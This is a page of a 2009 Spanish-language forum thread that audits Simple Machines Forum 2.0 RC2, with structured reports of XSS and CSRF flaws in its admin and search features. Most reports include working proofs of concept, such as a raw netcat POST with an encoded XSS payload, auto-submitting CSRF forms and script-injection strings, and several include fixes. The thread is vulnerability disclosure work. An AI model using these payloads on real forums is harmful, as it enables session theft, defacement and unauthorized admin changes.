elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Auditoría de seguridad hacia Simple Machines Forum 2.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Auditoría de seguridad hacia Simple Machines Forum 2.0  (Leído 57,257 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Desinstalación arbitraria de mods
« Respuesta #20 en: 30 Noviembre 2009, 20:42 pm »

Detalles
Descripción:Desinstalación arbitraria de mods
Descubierto por:WHK@elhacker.net
Código vulnerable:Sources/Packages.php:1167
URL Vulnerable:index.php?action=admin;area=packages;sa=flush
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2


Descripción

Voy a comenzar explicando la prueba de concepto directamente:
http://localhost/smf2.0/index.php?action=admin;area=packages;sa=flush

Primero que nada decir que esta acción no requiere de ningún token por lo
tanto puede ser ejecutado de forma arbitraria y consiste en que te elimina
todo el listado de paquetes instalados en el archivo que contiene todas tus
instalaciones "installed.list".

Si por ejemplo tienes instalado 4 mods los cuales modificaron tu foro ya no
podrás desintalarlos porque no figurarán instalados y los cambios en el
foro permanecerán modificados, eso quiere decir que si intentas reinstalar
el mismo mod no podrás porque los cambios ya están hechos y por lo tanto
tampoco puedes desintalarlos ni eleiminarlos.

Esto puede afectar por completo el funcionamiento de tu foro al intentar
realizar una actualización o cambio en un paquete nuevo ya que las
busquedas de reemplazo de strings en los archivos del foro ya no serán los
mismos.

La única solución sería restaurar un respaldo creado con anterioridad o
volver a instalar tu foro nuevamente con cada mod.

El fallo se produce en el archivo Sources/Packages.php linea 1167 en la
función "FlushInstal" ya que desde que es llamada la función hasta que
finaliza en ningúna parte se solicita un token de verificación para evitar
una ejecución arbitraria de esta acción.

http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Packages.php#1167
« Última modificación: 2 Diciembre 2009, 03:51 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
XSS en el buscador de usuarios
« Respuesta #21 en: 30 Noviembre 2009, 20:49 pm »

Detalles
Descripción:XSS en el buscador de usuarios
Descubierto por:WHK@elhacker.net
Código vulnerable:code: Sources/Subs-Auth.php:551
URL Vulnerable:URL: index.php?action=findmember;[TOKEN]
PoC:POST:
search=dd&input=pm_ignore_list&delim=%27%22%3c%3e%5b%58%53%53%20%61%63%e1%5d&quote=0
Afecta a:‭‬SMF 2.0 RC2


Descripción

El problema está en el archivo Sources/Subs-Auth.php linea 551
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Subs-Auth.php#551

ya que cuando se supone que debe filtrar en htmlspecialchars realmente no
lo hace:

Código
  1. // Take the delimiter over GET in case it's \n or something.
  2. $context['delimiter'] = isset($_REQUEST['delim']) ? ($_REQUEST['delim'] ==
  3. 'LB' ? '\\n' : $smcFunc['htmlspecialchars']($_REQUEST['delim'])) : ', ';
  4. $context['quote_results'] = !empty($_REQUEST['quote']);

Pero, porque no funciona en modo GET y si funciona en modo POST?
eso es porque smf pasa $_POST por $_REQUEST autobypaseando filtros como este.

Tal como me lo comentaba sirdarckcat, al principio es necesario ingresar el
token del usuario afectado pero eso puede ser bypaseado enviandolo sin su
sesión logueada, entonces cuando loguee se le redireccionará hcia su
busqueda infectada con el xss.

Prueba de concepto:
Código
  1. nc -v 127.0.0.1 80
  2. POST /smf_2/index.php?action=findmember;[TOKEN] HTTP/1.1
  3. Host: 127.0.0.1
  4. User-Agent: Mozilla/5.0 (X11; U; Linux i686; es-CL; rv:1.9.1.5)Gecko/20091102 Firefox/3.5.5
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  6. Accept-Language: es-cl,es;q=0.8,en-us;q=0.5,en;q=0.3
  7. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  8. Connection: close
  9. Cookie: PHPSESSID=[cookie]
  10. Content-Type: application/x-www-form-urlencoded
  11. Content-Length: 85
  12.  
  13. search=dd&input=pm_ignore_list&delim=%27%22%3c%3e%5b%58%53%53%20%61%63%e1%5d&quote=0

Retornará un código inyectado dentro del tag "<script />"
« Última modificación: 2 Diciembre 2009, 03:51 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
CSRF+XSS en el administrador de lenguajes
« Respuesta #22 en: 30 Noviembre 2009, 20:55 pm »

Detalles
Descripción:CSRF+XSS en el administrador de lenguajes
Descubierto por:cicatriz.r00t@gmail.com
Código vulnerable:N/A
URL Vulnerable:/index.php?action=admin;area=languages;sa=editlang;lid=english;
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2


Descripción

En este ataque se utiliza Cross-Site Request Forgery para realizar un
ataque Cross-Site Scripting.
Proof-of-Concept:
Código
  1. <body onload="document.forms[0].elements[5].click()">
  2. action="/index.php?action=admin;area=languages;sa=editlang;lid=english;"
  3. method="post" accept-charset="UTF-8">
  4. <input name="character_set" size="20" value="ISO-8859-1" type="text">
  5. <input name="locale" size="20" value="en_US" type="text">
  6. <input name="dictionary" size="20" value="en" type="text">
  7. <input name="spelling" size="20"
  8. value="american&#38;#34;&#38;#62;&#38;#60;&#38;#104;&#38;#49;&#38;#62;&#38;#88;&#38;#83;&#38;#83;&#38;#60;&#38;#47;&#38;#104;&#38;#49;&#38;#62;"
  9. type="text">
  10. <input name="rtl" class="check" type="checkbox">
  11. <input type="submit" value="Save" name="save_main"/>
  12. </form>
  13. </body>

Otra cosa a resaltar es el echo de poder cambiar el tipo de character set.
Cosa que nos daría la libertad de elegir un encoding vulnerable como UTF-7.

El problema se ubica aquí:

Código
  1. +++/var/www/POC/smf_2-0-rc1-2_install/Sources/ManageServer.php @@ 1195:1201
  2.  1195 $replace_array = array(
  3.  1196 '~\$txt\[\'lang_character_set\'\]\s=\s(\'|")[^\'"]+(\'|");~' =>
  4. '$txt[\'lang_character_set\'] = \'' . addslashes($_POST['character_set']) .
  5. '\';',
  6.  1197 '~\$txt\[\'lang_locale\'\]\s=\s(\'|")[^\'"]+(\'|");~' =>
  7. '$txt[\'lang_locale\'] = \'' . addslashes($_POST['locale']) . '\';',
  8.  1198 '~\$txt\[\'lang_dictionary\'\]\s=\s(\'|")[^\'"]+(\'|");~' =>
  9. '$txt[\'lang_dictionary\'] = \'' . addslashes($_POST['dictionary']) . '\';',
  10.  1199 '~\$txt\[\'lang_spelling\'\]\s=\s(\'|")[^\'"]+(\'|");~' =>
  11. '$txt[\'lang_spelling\'] = \'' . addslashes($_POST['spelling']) . '\';',
  12.  1200 '~\$txt\[\'lang_rtl\'\]\s=\s[A-Za-z0-9]+;~' =>
  13. '$txt[\'lang_rtl\'] = ' . (!empty($_POST['rtl']) ? 'true' : 'false') . ';',
  14.  1201 );
  15. ---/var/www/POC/smf_2-0-rc1-2_install/Sources/ManageServer.php

http://code.google.com/p/smf2-review/source/browse/trunk/Sources/ManageServer.php#1195

Lo único que salva al foro de no sufrir la ejecución de PHP es la función
addslashes(), porque todos estos datos son escritos a un archivo.
« Última modificación: 2 Diciembre 2009, 03:52 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
XSS en el nombre del foro
« Respuesta #23 en: 30 Noviembre 2009, 20:58 pm »

Detalles
Descripción:XSS en el nombre del foro
Descubierto por:ysk.sft@gmail.com
Código vulnerable:N/A
URL Vulnerable:N/A
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2


Descripción

El sistema para agregar subforos no filtra caracteres al agregar subforos,
haciendo que se pueda agregar codigo ‭‬javascript entre otros no solo en el
index si no que tambien en diversos lugares del panel de administración
entre ellos el mismo panel de administración de subforos , haciendo que
mediante codigo ‭‬javascript se podria hacer que en el navegador no se
pudiera ver el panel de administración de subforos haciendo casi imposible
para una persona de conocimientos basicos modificar el subforo para
eliminar el deface que se podria hacer con el XSS .

Saludos ;)
« Última modificación: 2 Diciembre 2009, 03:52 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
XSS en la URL del logo
« Respuesta #24 en: 30 Noviembre 2009, 21:00 pm »

Detalles
Descripción:XSS en la URL del logo
Descubierto por:cicatriz.r00t@gmail.com
Código vulnerable:N/A
URL Vulnerable:/index.php?action=admin;area=theme;sa=settings;th=1;
PoC:options[header_logo_url]=."/onerror=alert(0);//
Afecta a:‭‬SMF 2.0 RC2


Descripción

Bueno, esto en realidad no me pareció muy relevante pero quizás sirva de
todos modos. Si vamos a la pagina de administracion donde se cambia la
configuracion del theme que se esta usando
(/index.php?action=admin;area=theme;sa=settings;th=1;) y al modificar el
input "options[header_logo_url]", si ponemos algo como esto:
Código
  1. ."/onerror=alert(0);//

El código JS se ejecutaría en cualquier parte del foro.
« Última modificación: 2 Diciembre 2009, 03:52 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
CSRF en la configuración de post
« Respuesta #25 en: 30 Noviembre 2009, 21:05 pm »

Detalles
Descripción:CSRF en la configuración de post
Descubierto por:brlvldvlsmrtnz@gmail.com
Código vulnerable:N/A
URL Vulnerable:index.php?action=admin;area=postsettings;save;sa=posts
PoC:<form name=exploit method=POST
action=http://localhost/index.php?action=admin;area=postsettings;save;sa=posts
<input type=hidden name=enableEmbeddedFlash value=1>
</form>
Afecta a:‭‬SMF 2.0 RC2


Descripción

The vulnerabilitie is found in the function ModifyPostSettings in the file
ManagePosts.php , this function allows to you to change the post settings
and it does not verify the token of the session so ... It is CSRF.
The POC:
Código
  1. </head>
  2. <form name=exploit method=POST action=http://localhost/index.php?action=admin;area=postsettings;save;sa=posts>
  3. <input type=hidden name=enableEmbeddedFlash value=1>
  4. </form>
  5. document.exploit.submit();
  6. </body>
  7. </html>
« Última modificación: 2 Diciembre 2009, 03:53 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
XSS en el buscador de lenguajes
« Respuesta #26 en: 30 Noviembre 2009, 21:16 pm »

Detalles
Descripción:XSS en el buscador de lenguajes
Descubierto por:brlvldvlsmrtnz@gmail.com
Código vulnerable:ManageServer.php:408
URL Vulnerable:index.php?action=admin;area=languages;sa=add;[token]
PoC:<xss>
Afecta a:‭‬SMF 2.0 RC2


Descripción

La vulnerabilidad está en el buscador de lenguajes en la variable smf_add
que va dentro de un textbox.
Hay que escribir ">(codigo)

http://localhost/SMF/index.php?action=admin;area=languages;sa=add;[token]
« Última modificación: 2 Diciembre 2009, 03:53 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
XSS en "theme name" de "themes and layout settings"
« Respuesta #27 en: 30 Noviembre 2009, 21:20 pm »

Detalles
Descripción:XSS en "theme name" de "themes and layout settings"
Descubierto por:brlvldvlsmrtnz@gmail.com
Código vulnerable:Themes.php:346
URL Vulnerable:index.php?action=admin;area=theme;sa=list;token
PoC:N/A
Afecta a:‭‬SMF 2.0 RC2


Descripción

Si en los theme settings cambias el nombre del tema por uno que contenga
html y te vas a los themes and layout settings, verás tu código.

El error está en el archivo Themes.php en la línea 346 en la que hay que
poner :
Código
  1. $context['themes'][$row['id_theme']][$row['variable']] = htmlspecialchars($row['value']);
Adjunto archivo supuestamente seguro.

http://localhost/SMF/index.php?action=admin;area=theme;sa=list;token


Solución
http://smf2-review.googlecode.com/issues/attachment?aid=5572441877403199176&name=Themes.php
« Última modificación: 3 Diciembre 2009, 19:17 pm por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
XSS en "theme url and settings"
« Respuesta #28 en: 30 Noviembre 2009, 21:25 pm »

Detalles
Descripción:XSS en "theme url and settings"
Descubierto por:brlvldvlsmrtnz@gmail.com
Código vulnerable:N/A
URL Vulnerable:index.php?action=admin;area=theme;sa=settings;th=2;[token]
PoC:http://urlreal"><script>alert(1);</script>
Afecta a:‭‬SMF 2.0 RC2


Descripción

La vulnerabilidad se explota desde donde se configura el tema actual y es
vulnerable además del logo (que ya pusieron antes) en la url del tema y de
las imágenes.
Poniendo en las urls: http://urlreal"><script>alert("Robamos tus cookies
gracias...");</script> se consigue ejecutar ese código ‭‬‭‬‭‬javascript cada vez
que se muestre una imagen o se llame  a una hoja de estilo.


Solución
Esto se arregla en las líneas 819,820,821 poniendo esto :

Código
  1. foreach ($_POST['options'] as $opt => $val)
  2. $inserts[] = array(0, $_GET['th'], htmlspecialchars($opt),
  3. is_array($val) ? implode(',', htmlspecialchars($val)) : $val);

En el archivo themes.php en la url :
http://localhost/SMF/index.php?action=admin;area=theme;sa=settings;th=2;[token]
« Última modificación: 3 Diciembre 2009, 19:20 pm por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
XSS en la modificación de themes con nombres de theme
« Respuesta #29 en: 30 Noviembre 2009, 21:28 pm »

Detalles
Descripción:XSS en "theme url and settings"
Descubierto por:brlvldvlsmrtnz@gmail.com
Código vulnerable:N/A
URL Vulnerable:index.php?action=admin;area=theme;sa=settings;th=2;[token]
PoC:http://urlreal"><script>alert(1);</script>
Afecta a:‭‬SMF 2.0 RC2


Descripción

http://localhost/SMF/index.php?action=admin;area=theme;sa=edit;toke

Para arreglarlo hay que cambiar la línea 1711 del archivo themes.php por esta :
Código
  1. $context['themes'][$row['id_theme']][$row['variable']] =
  2. htmlspecialchars($row['value']);
« Última modificación: 2 Diciembre 2009, 03:54 am por WHK » En línea

Páginas: 1 2 [3] 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Auditoria de seguridad, mis comienzos...
Seguridad
Davisin 5 4,239 Último mensaje 9 Octubre 2012, 22:53 pm
por Epzylon
Auditoría de seguridad - Web Command Injection
Seguridad
MacGyver87 2 2,976 Último mensaje 29 Julio 2013, 14:37 pm
por MacGyver87
Simple Machines Forum hackeado y contraseñas de los usuarios en peligro
Foro Libre
Felix el Gato 1 2,530 Último mensaje 24 Julio 2013, 23:50 pm
por bacanzito
Hacia una evaluación eficaz de la seguridad en ICS
Noticias
r32 0 1,527 Último mensaje 4 Noviembre 2014, 18:02 pm
por r32
donde quitar el logo de simple machin forum
Dudas Generales
dark_night 1 2,051 Último mensaje 7 Abril 2016, 12:50 pm
por dark_night
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines